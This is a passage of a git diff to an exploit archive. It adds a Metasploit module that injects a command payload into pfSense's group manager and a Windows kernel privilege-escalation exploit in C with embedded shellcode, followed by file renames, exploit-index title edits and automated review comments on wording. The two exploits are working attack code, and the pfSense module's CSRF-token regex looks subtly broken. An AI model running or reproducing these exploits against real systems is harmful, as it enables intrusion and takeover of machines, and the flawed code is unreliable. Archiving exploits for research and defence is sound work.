+ fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 + if /Login to pfSense/ =~ res.body + Exploit::CheckCode::Detected + else + Exploit::CheckCode::Safe + end + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end + + def exploit + begin + cookie = login + version = detect_version(cookie) + vprint_good('Login Successful') + res = send_request_cgi( + 'uri' => '/system_groupmanager.php', + 'method' => 'GET', + 'cookie' => cookie, + 'vars_get' => { + 'act' => 'new' + } + ) + + /var csrfMagicToken = "(?sid:[a-z0-9,;:]+)";/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil? + vprint_status("CSRF Token for group creation: #{csrf}") + + group_name = rand_text_alpha(10) + post_vars = { + '__csrf_magic' => csrf, + 'groupname' => group_name, + 'description' => '', + 'members[]' => "0';#{payload.encoded};'", + 'groupid' => '', + 'save' => 'Save' + } + if version >= Gem::Version.new('2.3') + post_vars = post_vars.merge('gtype' => 'local') + elsif version <= Gem::Version.new('2.3') # catch for 2.2.6. left this elsif for easy expansion to other versions as needed + post_vars = post_vars.merge( + 'act' => '', + 'gtype' => '', + 'privid' => '' + ) + end + send_request_cgi( + 'uri' => '/system_groupmanager.php', + 'method' => 'POST', + 'cookie' => cookie, + 'vars_post' => post_vars, + 'vars_get' => { + 'act' => 'edit' + } + ) + print_status("Manual removal of group #{group_name} is required.") + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end +end \ No newline at end of file diff --git a/exploits/win_x86/local/43192.c b/exploits/win_x86/local/43192.c new file mode 100644 index 000000000..f6946d839 --- /dev/null +++ b/exploits/win_x86/local/43192.c 
@@ -0,0 +1,68 @@ +/* + EDB Note + Source ~ https://gist.github.com/xpn/736daa4d1ff7b9869f4b3d1e9a34d315/ff2e2465d4a07588d0148dc87e77b17b41ef9d1d + Source ~ https://blog.xpnsec.com/windows-warbird-privesc/ + Source ~ https://github.com/xpn/warbird_exploit + Ref ~ https://bugs.chromium.org/p/project-zero/issues/detail?id=1391 +*/ + + // Shellcode to be executed by exploit + const char shellcode[256] = { + 0xc7, 0x43, 0x04, 0x00, 0x00, 0x00, 0x00, 0x81, 0xc4, 0x0c, + 0x00, 0x00, 0x00, 0x81, 0xc4, 0x04, 0x00, 0x00, 0x00, 0x5f, + 0x5e, 0x5b, 0x89, 0xec, 0x5d, 0x81, 0xc4, 0x0c, 0x00, 0x00, + 0x00, 0x81, 0xc4, 0x04, 0x00, 0x00, 0x00, 0x5e, 0x5b, 0x5f, + 0x89, 0xec, 0x5d, 0x81, 0xc4, 0x04, 0x00, 0x00, 0x00, 0x81, + 0xc4, 0x04, 0x00, 0x00, 0x00, 0x5f, 0x5e, 0x5b, 0x89, 0xec, + 0x5d, 0x81, 0xc4, 0x04, 0x00, 0x00, 0x00, 0x81, 0xc4, 0x04, + 0x00, 0x00, 0x00, 0x5f, 0x5f, 0x5e, 0x5b, 0x89, 0xec, 0x5d, + 0x60, 0x64, 0xa1, 0x24, 0x01, 0x00, 0x00, 0xc7, 0x80, 0x3e, + 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xe8, + 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xec, + 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xf0, + 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xf4, + 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xf8, + 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xfc, + 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x50, + 0x01, 0x00, 0x00, 0x81, 0xb8, 0x7c, 0x01, 0x00, 0x00, 0x63, + 0x6d, 0x64, 0x2e, 0x74, 0x0d, 0x8b, 0x80, 0xb8, 0x00, 0x00, + 0x00, 0x2d, 0xb8, 0x00, 0x00, 0x00, 0xeb, 0xe7, 0x89, 0xc3, + 0x81, 0xb8, 0xb4, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x74, 0x0d, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x2d, 0xb8, + 0x00, 0x00, 0x00, 0xeb, 0xe7, 0x8b, 0x88, 0xfc, 0x00, 0x00, + 0x00, 0x89, 0x8b, 0xfc, 0x00, 0x00, 0x00, 0x61, 0xc3, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff + }; + 
+void exploit(void) { + BYTE Buffer[8]; + DWORD BytesReturned; + + RtlZeroMemory(Buffer, sizeof(Buffer)); + NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)185, Buffer, sizeof(Buffer), &BytesReturned); + + // Copy our shellcode to the NULL page + RtlCopyMemory(NULL, shellcode, 256); + + RtlZeroMemory(Buffer, sizeof(Buffer)); + NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)185, Buffer, sizeof(Buffer), &BytesReturned); +} + +BOOL APIENTRY DllMain( HMODULE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved + ) +{ + switch (ul_reason_for_call) + { + case DLL_PROCESS_ATTACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + exploit(); + break; + } + return TRUE; +} \ No newline at end of file diff --git a/exploits/windows/remote/26497.c b/exploits/windows/local/26497.c similarity index 97% rename from exploits/windows/remote/26497.c rename to exploits/windows/local/26497.c index e1336bfce..9f9139b8f 100644 --- a/exploits/windows/remote/26497.c +++ b/exploits/windows/local/26497.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/15381/info RealNetworks RealPlayer and RealOne Player are reported prone to a remote stack-based buffer-overflow vulnerability. The applications fail to perform boundary checks when parsing RM (Real Media) files. A remote attacker may execute arbitrary code on a vulnerable computer to gain unauthorized access. This vulnerability is reported to occur in RealNetworks products for Microsoft Windows, Linux, and Apple Mac platforms. +*/ /* RealPlayer .smil file buffer overflow Coded by nolimit@CiSO & Buzzdee diff --git a/exploits/windows/remote/35714.pl b/exploits/windows/local/35714.pl similarity index 100% rename from exploits/windows/remote/35714.pl rename to exploits/windows/local/35714.pl diff --git a/exploits/windows/local/39102.py b/exploits/windows/remote/39102.py similarity index 100% rename from exploits/windows/local/39102.py rename to exploits/windows/remote/39102.py 
diff --git a/exploits/windows/local/40043.py b/exploits/windows/remote/40043.py similarity index 100% rename from exploits/windows/local/40043.py rename to exploits/windows/remote/40043.py diff --git a/files_exploits.csv b/files_exploits.csv index 6cbb0bc3b..b0c0c17a7 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -626,7 +626,7 @@ id,file,description,date,author,type,platform,port 4288,exploits/windows/dos/4288.c,"Wireshark < 0.99.6 - Mms Remote Denial of Service",2007-08-14,ZwelL,dos,windows, 4289,exploits/windows/dos/4289.php,"EFS Easy Chat Server 2.2 - Remote Denial of Service",2007-08-14,NetJackal,dos,windows, 4293,exploits/win_x86/dos/4293.php,"PHP 5.2.0 (Windows x86) - 'PHP_win32sti' Local Buffer Overflow",2007-08-18,boecke,dos,win_x86, -4294,exploits/windows/dos/4294.pl,"Mercury/32 Mail SMTPD - Unauthenticated Remote Stack Based Overrun (PoC)",2007-08-18,eliteboy,dos,windows, +4294,exploits/windows/dos/4294.pl,"Mercury/32 Mail SMTPD - Unauthenticated Remote Stack Overrun (PoC)",2007-08-18,eliteboy,dos,windows, 4297,exploits/hardware/dos/4297.pl,"Cisco IP Phone 7940 - 3 SIP Messages Remote Denial of Service",2007-08-21,MADYNES,dos,hardware, 4298,exploits/hardware/dos/4298.pl,"Cisco IP Phone 7940 - 10 SIP Messages Remote Denial of Service",2007-08-21,MADYNES,dos,hardware, 4304,exploits/windows/dos/4304.php,"PHP 5.2.3 - PHP_ntuser ntuser_getuserlist() Local Buffer Overflow (PoC)",2007-08-23,shinnai,dos,windows, 
@@ -653,7 +653,7 @@ id,file,description,date,author,type,platform,port 4540,exploits/multiple/dos/4540.pl,"GCALDaemon 1.0-beta13 - Remote Denial of Service",2007-10-16,ikki,dos,multiple, 4559,exploits/multiple/dos/4559.txt,"Mozilla Firefox 2.0.0.7 - Remote Denial of Service",2007-10-22,BugReport.IR,dos,multiple, 4560,exploits/multiple/dos/4560.pl,"DNS Recursion Bandwidth Amplification - Denial of Service (PoC)",2007-10-23,ShadowHatesYou,dos,multiple, -4569,exploits/windows/dos/4569.pl,"CA BrightStor HSM r11.5 - Remote Stack Based Overflow / Denial of Service",2007-10-27,"Nice Name Crew",dos,windows, +4569,exploits/windows/dos/4569.pl,"CA BrightStor HSM r11.5 - Remote Stack Overflow / Denial of Service",2007-10-27,"Nice Name Crew",dos,windows, 4600,exploits/linux/dos/4600.py,"Firefly Media Server 0.2.4 - Remote Denial of Service",2007-11-02,nnp,dos,linux, 4601,exploits/multiple/dos/4601.txt,"Ubuntu 6.06 - DHCPd Remote Denial of Service",2007-11-02,RoMaNSoFt,dos,multiple, 4610,exploits/windows/dos/4610.html,"Viewpoint Media Player for IE 3.2 - Remote Stack Overflow (PoC)",2007-11-06,shinnai,dos,windows, 
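Review bot: on the 4569 line, dropping "Based" from "Remote Stack Based Overflow" leaves "Remote Stack Overflow", which reads as stack exhaustion rather than a buffer overflow located on the stack. Most other renames in this patch end up as "Stack Buffer Overflow"; using "Remote Stack Buffer Overflow / Denial of Service" here would keep the bug class unambiguous for anyone triaging by title. The unchanged 4610 context line has the same ambiguity and could be aligned in a follow-up.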
@@ -709,7 +709,7 @@ id,file,description,date,author,type,platform,port 5229,exploits/multiple/dos/5229.txt,"asg-sentry 7.0.0 - Multiple Vulnerabilities",2008-03-10,"Luigi Auriemma",dos,multiple, 5235,exploits/windows/dos/5235.py,"MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Denial of Service",2008-03-11,ryujin,dos,windows, 5258,exploits/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster - 'rpc.metad' Denial of Service (PoC)",2008-03-14,kingcope,dos,solaris, -5261,exploits/windows/dos/5261.py,"Rosoft Media Player 4.1.8 - RML Stack Based Buffer Overflow (PoC)",2008-03-15,"Wiktor Sierocinski",dos,windows, +5261,exploits/windows/dos/5261.py,"Rosoft Media Player 4.1.8 - RML Stack Buffer Overflow (PoC)",2008-03-15,"Wiktor Sierocinski",dos,windows, 5268,exploits/multiple/dos/5268.html,"Apple Safari (webkit) (iPhone/OSX/Windows) - Remote Denial of Service",2008-03-17,"Georgi Guninski",dos,multiple, 5270,exploits/windows/dos/5270.pl,"Home FTP Server 1.4.5 - Remote Denial of Service",2008-03-17,0in,dos,windows, 5306,exploits/multiple/dos/5306.txt,"Snircd 1.3.4 - 'send_user_mode' Denial of Service",2008-03-24,"Chris Porter",dos,multiple, 
@@ -1496,11 +1496,11 @@ id,file,description,date,author,type,platform,port 12206,exploits/windows/dos/12206.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetFileClose Overwrite (SEH) (PoC)",2010-04-13,s4squatch,dos,windows, 12207,exploits/windows/dos/12207.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetShareEnum Overwrite (SEH) (PoC)",2010-04-13,s4squatch,dos,windows, 12208,exploits/windows/dos/12208.html,"MagnetoSoft NetworkResources - ActiveX NetConnectionEnum Overwrite (SEH) (PoC)",2010-04-13,s4squatch,dos,windows, -12217,exploits/multiple/dos/12217.py,"Aircrack-NG Tools svn r1675 - Remote Heap-Based Buffer Overflow",2010-04-14,"Lukas Lueg",dos,multiple, +12217,exploits/multiple/dos/12217.py,"Aircrack-NG Tools svn r1675 - Remote Heap Buffer Overflow",2010-04-14,"Lukas Lueg",dos,multiple, 12228,exploits/windows/dos/12228.py,"MovieLibrary 1.4.401 - '.dmv' Local Denial of Service",2010-04-14,anonymous,dos,windows, 12229,exploits/windows/dos/12229.py,"Book Library 1.4.162 - '.bkd' Local Denial of Service",2010-04-14,anonymous,dos,windows, 12240,exploits/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow Denial of Service (PoC)",2010-04-14,mr_me,dos,windows, -15732,exploits/linux/dos/15732.txt,"FontForge - '.BDF' Font File Stack Based Buffer Overflow",2010-12-14,"Ulrik Persson",dos,linux, +15732,exploits/linux/dos/15732.txt,"FontForge - '.BDF' Font File Stack Buffer Overflow",2010-12-14,"Ulrik Persson",dos,linux, 12243,exploits/windows/dos/12243.py,"RPM Select/Elite 5.0 - '.xml Configuration parsing' Unicode Buffer Overflow (PoC)",2010-04-14,mr_me,dos,windows, 12252,exploits/hardware/dos/12252.txt,"IBM Bladecenter Management Module - Denial of Service",2010-04-15,"Alexey Sintsov",dos,hardware, 12258,exploits/windows/dos/12258.py,"Microsoft Windows - SMB Client-Side Bug (PoC) (MS10-006)",2010-04-16,"laurent gaffie",dos,windows, 
@@ -1814,7 +1814,7 @@ id,file,description,date,author,type,platform,port 15508,exploits/hardware/dos/15508.txt,"Camtron CMNC-200 IP Camera - Denial of Service",2010-11-13,"Trustwave's SpiderLabs",dos,hardware, 15514,exploits/windows/dos/15514.txt,"Foxit Reader 4.1.1 - Stack Overflow",2010-11-13,dookie,dos,windows, 15558,exploits/multiple/dos/15558.html,"Apple Safari 5.02 - Stack Overflow Denial of Service",2010-11-16,clshack,dos,multiple, -15580,exploits/windows/dos/15580.pl,"Native Instruments Traktor Pro 1.2.6 - Stack Based Buffer Overflow",2010-11-20,LiquidWorm,dos,windows, +15580,exploits/windows/dos/15580.pl,"Native Instruments Traktor Pro 1.2.6 - Stack Buffer Overflow",2010-11-20,LiquidWorm,dos,windows, 15581,exploits/windows/dos/15581.txt,"Native Instruments Reaktor 5 Player 5.5.1 - Heap Memory Corruption",2010-11-20,LiquidWorm,dos,windows, 15582,exploits/windows/dos/15582.pl,"Native Instruments Kontakt 4 Player - '.NKI' File Syntactic Analysis Buffer Overflow (PoC)",2010-11-20,LiquidWorm,dos,windows, 15583,exploits/windows/dos/15583.pl,"Native Instruments Massive 1.1.4 - KSD File Handling Use-After-Free",2010-11-20,LiquidWorm,dos,windows, 
@@ -1961,7 +1961,7 @@ id,file,description,date,author,type,platform,port 17164,exploits/windows/dos/17164.txt,"Microsoft Reader 2.1.1.3143 - Null Byte Write",2011-04-12,"Luigi Auriemma",dos,windows, 17188,exploits/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL - Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",dos,windows, 17201,exploits/multiple/dos/17201.php,"PHP 'phar' Extension 1.1.1 - Heap Overflow",2011-04-22,"Alexander Gavrun",dos,multiple, -17222,exploits/linux/dos/17222.c,"Libmodplug 0.8.8.2 - '.abc' Stack Based Buffer Overflow (PoC)",2011-04-28,epiphant,dos,linux, +17222,exploits/linux/dos/17222.c,"Libmodplug 0.8.8.2 - '.abc' Stack Buffer Overflow (PoC)",2011-04-28,epiphant,dos,linux, 17227,exploits/windows/dos/17227.py,"Microsoft Excel - Axis Properties Record Parsing Buffer Overflow (PoC) (MS11-02)",2011-04-29,webDEViL,dos,windows, 17266,exploits/windows/dos/17266.txt,"serva32 1.2.00 rc1 - Multiple Vulnerabilities",2011-05-10,"AutoSec Tools",dos,windows, 17278,exploits/windows/dos/17278.pl,"Adobe Audition 3.0 build 7283 - Session File Handling Buffer Overflow (PoC)",2011-05-13,LiquidWorm,dos,windows, 
@@ -1999,7 +1999,7 @@ id,file,description,date,author,type,platform,port 17567,exploits/osx/dos/17567.txt,"Apple Safari 5.0.6/5.1 - SVG DOM Processing (PoC)",2011-07-25,"Nikita Tarakanov",dos,osx, 17569,exploits/windows/dos/17569.py,"Ciscokits 1.0 - TFTP Server File Name Denial of Service",2011-07-25,"Craig Freyman",dos,windows, 17580,exploits/windows/dos/17580.py,"MyWebServer 1.0.3 - Denial of Service",2011-07-28,X-h4ck,dos,windows, -17582,exploits/windows/dos/17582.txt,"Citrix XenApp / XenDesktop - Stack Based Buffer Overflow",2011-07-28,"n.runs AG",dos,windows, +17582,exploits/windows/dos/17582.txt,"Citrix XenApp / XenDesktop - Stack Buffer Overflow",2011-07-28,"n.runs AG",dos,windows, 17583,exploits/windows/dos/17583.txt,"Citrix XenApp / XenDesktop XML Service - Heap Corruption",2011-07-28,"n.runs AG",dos,windows, 17601,exploits/windows/dos/17601.py,"Omnicom Alpha 4.0e LPD Server - Denial of Service",2011-08-03,"Craig Freyman",dos,windows, 17610,exploits/multiple/dos/17610.py,"OpenSLP 1.2.1 / < 1647 trunk - Denial of Service",2011-08-05,"Nicolas Gregoire",dos,multiple, 
@@ -2060,7 +2060,7 @@ id,file,description,date,author,type,platform,port 17981,exploits/windows/dos/17981.py,"Microsoft Windows - TCP/IP Stack Denial of Service (MS11-064)",2011-10-15,"Byoungyoung Lee",dos,windows, 17982,exploits/windows/dos/17982.pl,"BlueZone Desktop - '.zap' file Local Denial of Service",2011-10-15,Silent_Dream,dos,windows, 18006,exploits/windows/dos/18006.html,"Opera 11.52 - Denial of Service (PoC)",2011-10-20,pigtail23,dos,windows, -18007,exploits/windows/dos/18007.txt,"Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflows",2011-10-20,rgod,dos,windows, +18007,exploits/windows/dos/18007.txt,"Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Buffer Overflows",2011-10-20,rgod,dos,windows, 18008,exploits/windows/dos/18008.html,"Opera 11.52 - Stack Overflow",2011-10-20,pigtail23,dos,windows, 18011,exploits/windows/dos/18011.txt,"UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow",2011-10-20,DiGMi,dos,windows, 18014,exploits/windows/dos/18014.html,"Opera 11.51 - Use-After-Free Crash (PoC)",2011-10-21,"Roberto Suggi Liverani",dos,windows, 
@@ -2075,7 +2075,7 @@ id,file,description,date,author,type,platform,port 18029,exploits/windows/dos/18029.pl,"BlueZone - '.zft' File Local Denial of Service",2011-10-24,"Iolo Morganwg",dos,windows, 18030,exploits/windows/dos/18030.pl,"BlueZone Desktop - Multiple Malformed Files Local Denial of Service Vulnerabilities",2011-10-25,Silent_Dream,dos,windows, 18049,exploits/windows/dos/18049.txt,"Microsys PROMOTIC 8.1.4 - ActiveX GetPromoticSite Unitialized Pointer",2011-10-13,"Luigi Auriemma",dos,windows, -18052,exploits/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Based Buffer Overflow (PoC)",2011-10-31,rgod,dos,windows, +18052,exploits/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Buffer Overflow (PoC)",2011-10-31,rgod,dos,windows, 18078,exploits/windows/dos/18078.txt,"Microsoft Excel 2003 11.8335.8333 - Use-After-Free",2011-11-04,"Luigi Auriemma",dos,windows, 18106,exploits/windows/dos/18106.pl,"Soda PDF Professional 1.2.155 - '.pdf' / '.WWF' File Handling Denial of Service",2011-11-11,LiquidWorm,dos,windows, 18107,exploits/windows/dos/18107.py,"Kool Media Converter 2.6.0 - Denial of Service",2011-11-11,swami,dos,windows, 
@@ -2223,7 +2223,7 @@ id,file,description,date,author,type,platform,port 18958,exploits/windows/dos/18958.html,"Sony VAIO Wireless Manager 4.0.0.0 - Buffer Overflow",2012-05-31,"High-Tech Bridge SA",dos,windows, 18962,exploits/windows/dos/18962.py,"Sorensoft Power Media 6.0 - Denial of Service",2012-05-31,Onying,dos,windows, 18964,exploits/windows/dos/18964.txt,"IrfanView 4.33 - Format PlugIn ECW Decompression Heap Overflow",2012-06-01,"Francis Provencher",dos,windows, -18972,exploits/windows/dos/18972.txt,"IrfanView 4.33 - Format PlugIn '.TTF' File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",dos,windows, +18972,exploits/windows/dos/18972.txt,"IrfanView 4.33 - Format PlugIn '.TTF' File Parsing Stack Overflow",2012-06-02,"Francis Provencher",dos,windows, 19000,exploits/windows/dos/19000.py,"Audio Editor Master 5.4.1.217 - Denial of Service",2012-06-06,Onying,dos,windows, 19034,exploits/windows/dos/19034.cpp,"PEamp - '.mp3' Memory Corruption (PoC)",2012-06-10,Ayrbyte,dos,windows, 19046,exploits/aix/dos/19046.txt,"AppleShare IP Mail Server 5.0.3 - Buffer Overflow",1999-10-15,"Chris Wedgwood",dos,aix, 
@@ -2394,7 +2394,7 @@ id,file,description,date,author,type,platform,port 19940,exploits/windows/dos/19940.c,"Axent NetProwler 3.0 - IP Packets Denial of Service (1)",2000-05-18,"rain forest puppy",dos,windows, 19941,exploits/windows/dos/19941.casl,"Axent NetProwler 3.0 - IP Packets Denial of Service (2)",2000-05-18,"Pedro Quintanilha",dos,windows, 19950,exploits/linux/dos/19950.c,"XFree86 X11R6 3.3.5/3.3.6/4.0 Xserver - Denial of Service",2000-05-18,"Chris Evans",dos,linux, -19961,exploits/windows/dos/19961.txt,"Oracle Outside-In - '.LWP' File Parsing Stack Based Buffer Overflow",2012-07-20,"Francis Provencher",dos,windows, +19961,exploits/windows/dos/19961.txt,"Oracle Outside-In - '.LWP' File Parsing Stack Buffer Overflow",2012-07-20,"Francis Provencher",dos,windows, 19962,exploits/windows/dos/19962.txt,"Oracle Outside-In JP2 - File Parsing Heap Overflow",2012-07-20,"Francis Provencher",dos,windows, 19974,exploits/windows/dos/19974.c,"Microsoft Windows Media Services 4.0/4.1 - Denial of Service (MS00-038)",2000-05-31,"Kit Knox",dos,windows, 19977,exploits/multiple/dos/19977.txt,"Real Networks Real Server 7.0/7.0.1/8.0 Beta - view-source Denial of Service",2000-06-01,"Ussr Labs",dos,multiple, 
@@ -2942,7 +2942,7 @@ id,file,description,date,author,type,platform,port 22920,exploits/unix/dos/22920.txt,"IBM U2 UniVerse 10.0.0.9 - UVADMSH Buffer Overflow",2003-07-16,kf,dos,unix, 22926,exploits/multiple/dos/22926.txt,"Witango Server 5.0.1.061 - Remote Cookie Buffer Overflow",2003-07-18,"Next Generation Software",dos,multiple, 22935,exploits/multiple/dos/22935.txt,"Websense Proxy - Filter Bypass",2012-11-26,"Nahuel Grisolia",dos,multiple, -22938,exploits/linux/dos/22938.py,"mcrypt 2.6.8 - Stack Based Buffer Overflow (PoC)",2012-11-26,_ishikawa,dos,linux, +22938,exploits/linux/dos/22938.py,"mcrypt 2.6.8 - Stack Buffer Overflow (PoC)",2012-11-26,_ishikawa,dos,linux, 22970,exploits/windows/dos/22970.txt,"NetScreen ScreenOS 4.0.1/4.0.3 - TCP Window Size Remote Denial of Service",2003-07-29,"Papa loves Mambo",dos,windows, 23003,exploits/windows/dos/23003.py,"UMPlayer Portable 0.95 - Crash (PoC)",2012-11-29,p3kok,dos,windows, 22978,exploits/hardware/dos/22978.txt,"Cisco IOS 10/11/12 - UDP Echo Service Memory Disclosure",2003-08-01,FX,dos,hardware, 
@@ -2960,8 +2960,8 @@ id,file,description,date,author,type,platform,port 23051,exploits/multiple/dos/23051.txt,"WapServ 1.0 - Denial of Service",2003-08-22,"Blue eyeguy4u",dos,multiple, 23053,exploits/windows/dos/23053.pl,"Vpop3d - Remote Denial of Service",2003-08-22,daniels@legend.co.uk,dos,windows, 23056,exploits/windows/dos/23056.c,"OptiSoft Blubster 2.5 - Remote Denial of Service",2003-08-25,"Luca Ercoli",dos,windows, -23075,exploits/linux/dos/23075.pl,"MySQL (Linux) - Stack Based Buffer Overrun (PoC)",2012-12-02,kingcope,dos,linux, -23076,exploits/linux/dos/23076.pl,"MySQL (Linux) - Heap Based Overrun (PoC)",2012-12-02,kingcope,dos,linux, +23075,exploits/linux/dos/23075.pl,"MySQL (Linux) - Stack Buffer Overrun (PoC)",2012-12-02,kingcope,dos,linux, +23076,exploits/linux/dos/23076.pl,"MySQL (Linux) - Heap Overrun (PoC)",2012-12-02,kingcope,dos,linux, 23078,exploits/linux/dos/23078.txt,"MySQL - Denial of Service (PoC)",2012-12-02,kingcope,dos,linux, 23086,exploits/windows/dos/23086.txt,"Yahoo! Messenger 4.0/5.0 - Remote Denial of Service",2003-09-01,diman,dos,windows, 23087,exploits/hardware/dos/23087.c,"Check Point Firewall-1 4.x - SecuRemote Internal Interface Address Information Leakage",2001-07-17,"Jim Becher",dos,hardware, 
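Review bot: the two MySQL entries stop being parallel after this hunk: 23075 becomes "Stack Buffer Overrun (PoC)" while 23076 becomes "Heap Overrun (PoC)" with no "Buffer". If the goal of the rename is one consistent vocabulary, give 23076 the matching form "Heap Buffer Overrun (PoC)", or note in the commit message why the heap entry is worded differently.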
@@ -3069,10 +3069,10 @@ id,file,description,date,author,type,platform,port 23540,exploits/freebsd/dos/23540.c,"KAME Racoon - 'Initial Contact' SA Deletion",2004-01-14,"Thomas Walpuski",dos,freebsd, 23543,exploits/multiple/dos/23543.txt,"Vicomsoft RapidCache Server 2.0/2.2.6 - Host Argument Denial of Service",2004-01-15,"Peter Winter-Smith",dos,multiple, 23556,exploits/multiple/dos/23556.txt,"GetWare Web Server Component - Content-Length Value Remote Denial of Service",2004-01-19,"Luigi Auriemma",dos,multiple, -23565,exploits/windows/dos/23565.txt,"Sony PC Companion 2.1 - 'DownloadURLToFile()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,dos,windows, -23567,exploits/windows/dos/23567.txt,"Sony PC Companion 2.1 - 'Load()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,dos,windows, -23568,exploits/windows/dos/23568.txt,"Sony PC Companion 2.1 - 'CheckCompatibility()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,dos,windows, -23569,exploits/windows/dos/23569.txt,"Sony PC Companion 2.1 - 'Admin_RemoveDirectory()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,dos,windows, +23565,exploits/windows/dos/23565.txt,"Sony PC Companion 2.1 - 'DownloadURLToFile()' Unicode Stack Buffer Overflow",2012-12-21,LiquidWorm,dos,windows, +23567,exploits/windows/dos/23567.txt,"Sony PC Companion 2.1 - 'Load()' Unicode Stack Buffer Overflow",2012-12-21,LiquidWorm,dos,windows, +23568,exploits/windows/dos/23568.txt,"Sony PC Companion 2.1 - 'CheckCompatibility()' Unicode Stack Buffer Overflow",2012-12-21,LiquidWorm,dos,windows, +23569,exploits/windows/dos/23569.txt,"Sony PC Companion 2.1 - 'Admin_RemoveDirectory()' Unicode Stack Buffer Overflow",2012-12-21,LiquidWorm,dos,windows, 23574,exploits/windows/dos/23574.txt,"FireFly Mediaserver 1.0.0.1359 - Null Pointer Dereference",2012-12-21,"High-Tech Bridge SA",dos,windows, 23584,exploits/windows/dos/23584.c,"McAfee ePolicy Orchestrator 1.x/2.x/3.0 Agent - POST Buffer 
Mismanagement",2004-01-22,cyber_flash,dos,windows, 23590,exploits/multiple/dos/23590.txt,"Reptile Web Server Reptile Web Server 20020105 - Denial of Service",2004-01-23,"Donato Ferrante",dos,multiple, @@ -3163,7 +3163,7 @@ id,file,description,date,author,type,platform,port 24070,exploits/multiple/dos/24070.txt,"Rosiello Security Sphiro HTTPD 0.1B - Remote Heap Buffer Overflow",2004-04-30,"Slotto Corleone",dos,multiple, 24078,exploits/linux/dos/24078.c,"PaX 2.6 Kernel Patch - Denial of Service",2004-05-03,Shadowinteger,dos,linux, 24080,exploits/windows/dos/24080.pl,"Titan FTP Server 3.0 - 'LIST' Denial of Service",2004-05-04,storm,dos,windows, -24095,exploits/linux/dos/24095.txt,"DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Based Buffer Overflow",2004-05-06,"Joel Eriksson",dos,linux, +24095,exploits/linux/dos/24095.txt,"DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Buffer Overflow",2004-05-06,"Joel Eriksson",dos,linux, 24096,exploits/linux/dos/24096.pl,"Qualcomm Eudora 5.2.1/6.x - Embedded Hyperlink Buffer Overrun",2004-05-07,"Paul Szabo",dos,linux, 24103,exploits/windows/dos/24103.txt,"MailEnable Mail Server HTTPMail 1.x - Remote Heap Overflow",2004-05-09,"Behrang Fouladi",dos,windows, 24107,exploits/windows/dos/24107.pl,"EMule Web 0.42 Control Panel - Denial of Service",2004-05-10,"Rafel Ivgi The-Insider",dos,windows, 
@@ -3211,7 +3211,7 @@ id,file,description,date,author,type,platform,port 24352,exploits/multiple/dos/24352.java,"Free Web Chat Initial Release - Connection Saturation Denial of Service",2004-08-04,"Donato Ferrante",dos,multiple, 24355,exploits/linux/dos/24355.txt,"GNU Info 4.7 - Follow XRef Buffer Overrun",2004-08-06,"Josh Martin",dos,linux, 24358,exploits/linux/dos/24358.txt,"Xine-Lib 0.99 - Remote Buffer Overflow",2004-07-08,c0ntex,dos,linux, -24360,exploits/linux/dos/24360.py,"GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun (1)",2004-08-09,"Juan Pablo Martinez Kuhn",dos,linux, +24360,exploits/linux/dos/24360.py,"GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Buffer Overrun (1)",2004-08-09,"Juan Pablo Martinez Kuhn",dos,linux, 24362,exploits/windows/dos/24362.txt,"Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun",2004-08-11,"Paul Craig",dos,windows, 24386,exploits/multiple/dos/24386.txt,"British National Corpus SARA - Remote Buffer Overflow",2004-07-20,"Matthias Bethke",dos,multiple, 